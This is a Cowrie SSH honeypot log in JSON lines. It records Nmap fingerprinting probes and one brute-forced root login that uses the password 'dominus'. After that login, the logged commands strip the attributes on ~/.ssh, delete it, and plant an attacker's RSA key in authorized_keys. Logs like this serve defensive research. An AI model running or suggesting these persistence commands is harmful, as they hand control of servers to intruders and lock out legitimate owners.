{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50344,"dst_ip":"1.2.3.4","dst_port":22,"session":"8288848a116d","protocol":"ssh","message":"New connection: 212.227.235.229:50344 (1.2.3.4:22) [session: 8288848a116d]","sensor":"my-vps","timestamp":"2025-08-26T00:26:26.503637Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50340,"dst_ip":"1.2.3.4","dst_port":22,"session":"e15b7ce80df6","protocol":"ssh","message":"New connection: 212.227.235.229:50340 (1.2.3.4:22) [session: e15b7ce80df6]","sensor":"my-vps","timestamp":"2025-08-26T00:26:26.504215Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50342,"dst_ip":"1.2.3.4","dst_port":22,"session":"4299379bd80e","protocol":"ssh","message":"New connection: 212.227.235.229:50342 (1.2.3.4:22) [session: 4299379bd80e]","sensor":"my-vps","timestamp":"2025-08-26T00:26:26.504941Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50338,"dst_ip":"1.2.3.4","dst_port":22,"session":"f3025dc14a9c","protocol":"ssh","message":"New connection: 212.227.235.229:50338 (1.2.3.4:22) [session: f3025dc14a9c]","sensor":"my-vps","timestamp":"2025-08-26T00:26:26.505911Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50358,"dst_ip":"1.2.3.4","dst_port":22,"session":"a09399100e63","protocol":"ssh","message":"New connection: 212.227.235.229:50358 (1.2.3.4:22) [session: a09399100e63]","sensor":"my-vps","timestamp":"2025-08-26T00:26:26.525428Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50356,"dst_ip":"1.2.3.4","dst_port":22,"session":"e4cfef892944","protocol":"ssh","message":"New connection: 212.227.235.229:50356 (1.2.3.4:22) [session: e4cfef892944]","sensor":"my-vps","timestamp":"2025-08-26T00:26:26.526209Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.10.0","message":"Remote SSH version: SSH-2.0-libssh2_1.10.0","sensor":"my-vps","timestamp":"2025-08-26T00:26:26.526951Z","src_ip":"212.227.235.229","session":"a09399100e63"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Nmap_SSH2_Enum_Algos","message":"Remote SSH version: SSH-2.0-Nmap_SSH2_Enum_Algos","sensor":"my-vps","timestamp":"2025-08-26T00:26:26.527558Z","src_ip":"212.227.235.229","session":"f3025dc14a9c"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:26:26.625385Z","src_ip":"212.227.235.229","session":"e15b7ce80df6"}
{"eventid":"cowrie.client.version","version":"SSH-1.5-NmapNSE_1.0","message":"Remote SSH version: SSH-1.5-NmapNSE_1.0","sensor":"my-vps","timestamp":"2025-08-26T00:26:26.626183Z","src_ip":"212.227.235.229","session":"94ecc0ad38b0"}
{"eventid":"cowrie.client.version","version":"SSH-1.5-Nmap-SSH1-Hostkey","message":"Remote SSH version: SSH-1.5-Nmap-SSH1-Hostkey","sensor":"my-vps","timestamp":"2025-08-26T00:26:26.626944Z","src_ip":"212.227.235.229","session":"8288848a116d"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-OpenSSH_6.0p2 Debian-4+deb7u2","message":"Remote SSH version: SSH-2.0-OpenSSH_6.0p2 Debian-4+deb7u2","sensor":"my-vps","timestamp":"2025-08-26T00:26:26.628624Z","src_ip":"212.227.235.229","session":"e4cfef892944"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:26:26.629359Z","src_ip":"212.227.235.229","session":"4299379bd80e"}
{"eventid":"cowrie.client.kex","hassh":"b4b8ae3d7241d2c1dc54b4df7e8c19d1","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b4b8ae3d7241d2c1dc54b4df7e8c19d1","sensor":"my-vps","timestamp":"2025-08-26T00:26:26.629901Z","src_ip":"212.227.235.229","session":"a09399100e63"}
{"eventid":"cowrie.client.kex","hassh":"a20aced7c9824fd804f59e68dd801ad3","hasshAlgorithms":"diffie-hellman-group1-sha1;aes128-cbc,3des-cbc,blowfish-cbc,aes192-cbc,aes256-cbc,aes128-ctr,aes192-ctr,aes256-ctr;hmac-md5,hmac-sha1,hmac-ripemd160;none","kexAlgs":["diffie-hellman-group1-sha1"],"keyAlgs":["ssh-dss","ssh-rsa"],"encCS":["aes128-cbc","3des-cbc","blowfish-cbc","aes192-cbc","aes256-cbc","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-md5","hmac-sha1","hmac-ripemd160"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: a20aced7c9824fd804f59e68dd801ad3","sensor":"my-vps","timestamp":"2025-08-26T00:26:26.632693Z","src_ip":"212.227.235.229","session":"f3025dc14a9c"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:26:26.633825Z","src_ip":"212.227.235.229","session":"94ecc0ad38b0"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:26:26.634512Z","src_ip":"212.227.235.229","session":"8288848a116d"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:26:26.635416Z","src_ip":"212.227.235.229","session":"f3025dc14a9c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50682,"dst_ip":"1.2.3.4","dst_port":22,"session":"e9f8d4628de0","protocol":"ssh","message":"New connection: 212.227.235.229:50682 (1.2.3.4:22) [session: e9f8d4628de0]","sensor":"my-vps","timestamp":"2025-08-26T00:26:26.859344Z"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:26:26.922324Z","src_ip":"212.227.235.229","session":"a09399100e63"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Nmap-SSH2-Hostkey","message":"Remote SSH version: SSH-2.0-Nmap-SSH2-Hostkey","sensor":"my-vps","timestamp":"2025-08-26T00:26:26.971203Z","src_ip":"212.227.235.229","session":"e9f8d4628de0"}
{"eventid":"cowrie.client.kex","hassh":"e788c657d1a22971d5026526ffd2e918","hasshAlgorithms":"diffie-hellman-group1-sha1,diffie-hellman-group14-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-cbc,3des-cbc,blowfish-cbc,aes192-cbc,aes256-cbc,aes128-ctr,aes192-ctr,aes256-ctr;hmac-md5,hmac-sha1,hmac-ripemd160;none","kexAlgs":["diffie-hellman-group1-sha1","diffie-hellman-group14-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-dss"],"encCS":["aes128-cbc","3des-cbc","blowfish-cbc","aes192-cbc","aes256-cbc","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-md5","hmac-sha1","hmac-ripemd160"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: e788c657d1a22971d5026526ffd2e918","sensor":"my-vps","timestamp":"2025-08-26T00:26:27.057323Z","src_ip":"212.227.235.229","session":"e9f8d4628de0"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:26:27.058527Z","src_ip":"212.227.235.229","session":"e9f8d4628de0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51052,"dst_ip":"1.2.3.4","dst_port":22,"session":"b1e5accdf5bc","protocol":"ssh","message":"New connection: 212.227.235.229:51052 (1.2.3.4:22) [session: b1e5accdf5bc]","sensor":"my-vps","timestamp":"2025-08-26T00:26:27.205572Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Nmap-SSH2-Hostkey","message":"Remote SSH version: SSH-2.0-Nmap-SSH2-Hostkey","sensor":"my-vps","timestamp":"2025-08-26T00:26:27.319475Z","src_ip":"212.227.235.229","session":"b1e5accdf5bc"}
{"eventid":"cowrie.client.kex","hassh":"e788c657d1a22971d5026526ffd2e918","hasshAlgorithms":"diffie-hellman-group1-sha1,diffie-hellman-group14-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-cbc,3des-cbc,blowfish-cbc,aes192-cbc,aes256-cbc,aes128-ctr,aes192-ctr,aes256-ctr;hmac-md5,hmac-sha1,hmac-ripemd160;none","kexAlgs":["diffie-hellman-group1-sha1","diffie-hellman-group14-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa"],"encCS":["aes128-cbc","3des-cbc","blowfish-cbc","aes192-cbc","aes256-cbc","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-md5","hmac-sha1","hmac-ripemd160"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: e788c657d1a22971d5026526ffd2e918","sensor":"my-vps","timestamp":"2025-08-26T00:26:27.405512Z","src_ip":"212.227.235.229","session":"b1e5accdf5bc"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:26:27.667816Z","src_ip":"212.227.235.229","session":"b1e5accdf5bc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51780,"dst_ip":"1.2.3.4","dst_port":22,"session":"7a00c21a9980","protocol":"ssh","message":"New connection: 212.227.235.229:51780 (1.2.3.4:22) [session: 7a00c21a9980]","sensor":"my-vps","timestamp":"2025-08-26T00:26:27.756058Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Nmap-SSH2-Hostkey","message":"Remote SSH version: SSH-2.0-Nmap-SSH2-Hostkey","sensor":"my-vps","timestamp":"2025-08-26T00:26:27.867835Z","src_ip":"212.227.235.229","session":"7a00c21a9980"}
{"eventid":"cowrie.client.kex","hassh":"e788c657d1a22971d5026526ffd2e918","hasshAlgorithms":"diffie-hellman-group1-sha1,diffie-hellman-group14-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-cbc,3des-cbc,blowfish-cbc,aes192-cbc,aes256-cbc,aes128-ctr,aes192-ctr,aes256-ctr;hmac-md5,hmac-sha1,hmac-ripemd160;none","kexAlgs":["diffie-hellman-group1-sha1","diffie-hellman-group14-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ecdsa-sha2-nistp256"],"encCS":["aes128-cbc","3des-cbc","blowfish-cbc","aes192-cbc","aes256-cbc","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-md5","hmac-sha1","hmac-ripemd160"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: e788c657d1a22971d5026526ffd2e918","sensor":"my-vps","timestamp":"2025-08-26T00:26:27.955459Z","src_ip":"212.227.235.229","session":"7a00c21a9980"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:26:28.216865Z","src_ip":"212.227.235.229","session":"7a00c21a9980"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52650,"dst_ip":"1.2.3.4","dst_port":22,"session":"465e7c890071","protocol":"ssh","message":"New connection: 212.227.235.229:52650 (1.2.3.4:22) [session: 465e7c890071]","sensor":"my-vps","timestamp":"2025-08-26T00:26:28.302815Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Nmap-SSH2-Hostkey","message":"Remote SSH version: SSH-2.0-Nmap-SSH2-Hostkey","sensor":"my-vps","timestamp":"2025-08-26T00:26:28.415333Z","src_ip":"212.227.235.229","session":"465e7c890071"}
{"eventid":"cowrie.client.kex","hassh":"e788c657d1a22971d5026526ffd2e918","hasshAlgorithms":"diffie-hellman-group1-sha1,diffie-hellman-group14-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-cbc,3des-cbc,blowfish-cbc,aes192-cbc,aes256-cbc,aes128-ctr,aes192-ctr,aes256-ctr;hmac-md5,hmac-sha1,hmac-ripemd160;none","kexAlgs":["diffie-hellman-group1-sha1","diffie-hellman-group14-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ecdsa-sha2-nistp384"],"encCS":["aes128-cbc","3des-cbc","blowfish-cbc","aes192-cbc","aes256-cbc","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-md5","hmac-sha1","hmac-ripemd160"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: e788c657d1a22971d5026526ffd2e918","sensor":"my-vps","timestamp":"2025-08-26T00:26:28.502120Z","src_ip":"212.227.235.229","session":"465e7c890071"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:26:28.503289Z","src_ip":"212.227.235.229","session":"465e7c890071"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53036,"dst_ip":"1.2.3.4","dst_port":22,"session":"f2d2be093fc6","protocol":"ssh","message":"New connection: 212.227.235.229:53036 (1.2.3.4:22) [session: f2d2be093fc6]","sensor":"my-vps","timestamp":"2025-08-26T00:26:28.650993Z"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:26:28.763375Z","src_ip":"212.227.235.229","session":"e4cfef892944"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Nmap-SSH2-Hostkey","message":"Remote SSH version: SSH-2.0-Nmap-SSH2-Hostkey","sensor":"my-vps","timestamp":"2025-08-26T00:26:28.764295Z","src_ip":"212.227.235.229","session":"f2d2be093fc6"}
{"eventid":"cowrie.client.kex","hassh":"e788c657d1a22971d5026526ffd2e918","hasshAlgorithms":"diffie-hellman-group1-sha1,diffie-hellman-group14-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-cbc,3des-cbc,blowfish-cbc,aes192-cbc,aes256-cbc,aes128-ctr,aes192-ctr,aes256-ctr;hmac-md5,hmac-sha1,hmac-ripemd160;none","kexAlgs":["diffie-hellman-group1-sha1","diffie-hellman-group14-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ecdsa-sha2-nistp521"],"encCS":["aes128-cbc","3des-cbc","blowfish-cbc","aes192-cbc","aes256-cbc","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-md5","hmac-sha1","hmac-ripemd160"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: e788c657d1a22971d5026526ffd2e918","sensor":"my-vps","timestamp":"2025-08-26T00:26:28.850821Z","src_ip":"212.227.235.229","session":"f2d2be093fc6"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:26:28.852097Z","src_ip":"212.227.235.229","session":"f2d2be093fc6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53508,"dst_ip":"1.2.3.4","dst_port":22,"session":"c2d28500996e","protocol":"ssh","message":"New connection: 212.227.235.229:53508 (1.2.3.4:22) [session: c2d28500996e]","sensor":"my-vps","timestamp":"2025-08-26T00:26:28.999801Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Nmap-SSH2-Hostkey","message":"Remote SSH version: SSH-2.0-Nmap-SSH2-Hostkey","sensor":"my-vps","timestamp":"2025-08-26T00:26:29.111512Z","src_ip":"212.227.235.229","session":"c2d28500996e"}
{"eventid":"cowrie.client.kex","hassh":"e788c657d1a22971d5026526ffd2e918","hasshAlgorithms":"diffie-hellman-group1-sha1,diffie-hellman-group14-sha1,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-cbc,3des-cbc,blowfish-cbc,aes192-cbc,aes256-cbc,aes128-ctr,aes192-ctr,aes256-ctr;hmac-md5,hmac-sha1,hmac-ripemd160;none","kexAlgs":["diffie-hellman-group1-sha1","diffie-hellman-group14-sha1","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-ed25519"],"encCS":["aes128-cbc","3des-cbc","blowfish-cbc","aes192-cbc","aes256-cbc","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-md5","hmac-sha1","hmac-ripemd160"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: e788c657d1a22971d5026526ffd2e918","sensor":"my-vps","timestamp":"2025-08-26T00:26:29.199344Z","src_ip":"212.227.235.229","session":"c2d28500996e"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:26:29.459090Z","src_ip":"212.227.235.229","session":"c2d28500996e"}
{"eventid":"cowrie.session.connect","src_ip":"24.108.102.132","src_port":44744,"dst_ip":"1.2.3.4","dst_port":22,"session":"e11518a2a94b","protocol":"ssh","message":"New connection: 24.108.102.132:44744 (1.2.3.4:22) [session: e11518a2a94b]","sensor":"my-vps","timestamp":"2025-08-26T00:26:36.365757Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:26:36.371017Z","src_ip":"24.108.102.132","session":"e11518a2a94b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:26:36.544541Z","src_ip":"24.108.102.132","session":"e11518a2a94b"}
{"eventid":"cowrie.login.success","username":"root","password":"dominus","message":"login attempt [root/dominus] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:26:37.243875Z","src_ip":"24.108.102.132","session":"e11518a2a94b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:26:37.643739Z","src_ip":"24.108.102.132","session":"e11518a2a94b"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:26:37.644409Z","src_ip":"24.108.102.132","session":"e11518a2a94b"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:26:37.645262Z","src_ip":"24.108.102.132","session":"e11518a2a94b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:26:37.819266Z","src_ip":"24.108.102.132","session":"e11518a2a94b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:26:38.191715Z","src_ip":"24.108.102.132","session":"e11518a2a94b"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:26:38.192405Z","src_ip":"24.108.102.132","session":"e11518a2a94b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57260,"dst_ip":"1.2.3.4","dst_port":22,"session":"dd44ee60ba4d","protocol":"ssh","message":"New connection: 212.227.235.229:57260 (1.2.3.4:22) [session: dd44ee60ba4d]","sensor":"my-vps","timestamp":"2025-08-26T00:26:38.232682Z"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:26:38.367102Z","src_ip":"24.108.102.132","session":"e11518a2a94b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:26:38.368139Z","src_ip":"24.108.102.132","session":"e11518a2a94b"}
{"eventid":"cowrie.session.connect","src_ip":"24.108.102.132","src_port":44750,"dst_ip":"1.2.3.4","dst_port":22,"session":"966aa1997a42","protocol":"ssh","message":"New connection: 24.108.102.132:44750 (1.2.3.4:22) [session: 966aa1997a42]","sensor":"my-vps","timestamp":"2025-08-26T00:26:38.514484Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:26:38.519704Z","src_ip":"24.108.102.132","session":"966aa1997a42"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:26:38.681663Z","src_ip":"24.108.102.132","session":"966aa1997a42"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T00:26:38.776086Z","src_ip":"212.227.235.229","session":"dd44ee60ba4d"}
